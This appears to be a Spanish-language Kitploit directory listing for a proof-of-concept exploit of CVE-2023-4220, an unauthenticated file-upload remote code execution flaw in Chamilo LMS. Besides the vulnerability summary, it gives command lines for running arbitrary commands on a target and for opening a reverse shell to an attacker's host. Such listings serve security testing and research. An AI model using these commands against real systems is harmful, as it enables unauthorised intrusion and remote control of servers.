Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-4226-POC — POC para CVE-2023-4220 - Chamilo LMS Unauthenticated Big Upload File Remote Code Execution | Kitploit
Herramientas/GitHubGitHub/krishnan-tech/cve-2023-4226-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubkrishnan-tech/cve-2023-4226-poc

CVE-2023-4226-POC

POC para CVE-2023-4220 - Chamilo LMS Unauthenticated Big Upload File Remote Code Execution

Ver Repositorio
11hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de CVE-2023-4220

Más información sobre CVE-2023-4220: Aviso de StarLabs

Resumen

ProductoChamilo
VendedorChamilo
GravedadAlta - Los adversarios pueden explotar vulnerabilidades de software para obtener ejecución remota de código no autenticada.
Versiones afectadas<= v1.11.24
Versiones probadasv1.11.24 (última versión al momento de escribir)
Identificador CVECVE-2023-4220
Descripción CVECarga de archivos sin restricciones en la funcionalidad de carga de archivos grandes en /main/inc/lib/javascript/bigupload/inc/bigUpload.php en Chamilo LMS <= v1.11.24 permite a atacantes no autenticados realizar ataques de cross-site scripting almacenado y obtener ejecución remota de código mediante la subida de una webshell.
Clasificación CWECWE-434: Carga sin restricciones de archivos con tipo peligroso
Clasificación CAPECCAPEC-650: Subir una webshell a un servidor web

Prueba de Concepto (PoC)

Ejecutar comandos directamente

Para ejecutar comandos directamente, use el siguiente comando:

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami

Obtener una shell inversa

Para obtener una shell inversa, use el siguiente comando:

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>

Descargar herramienta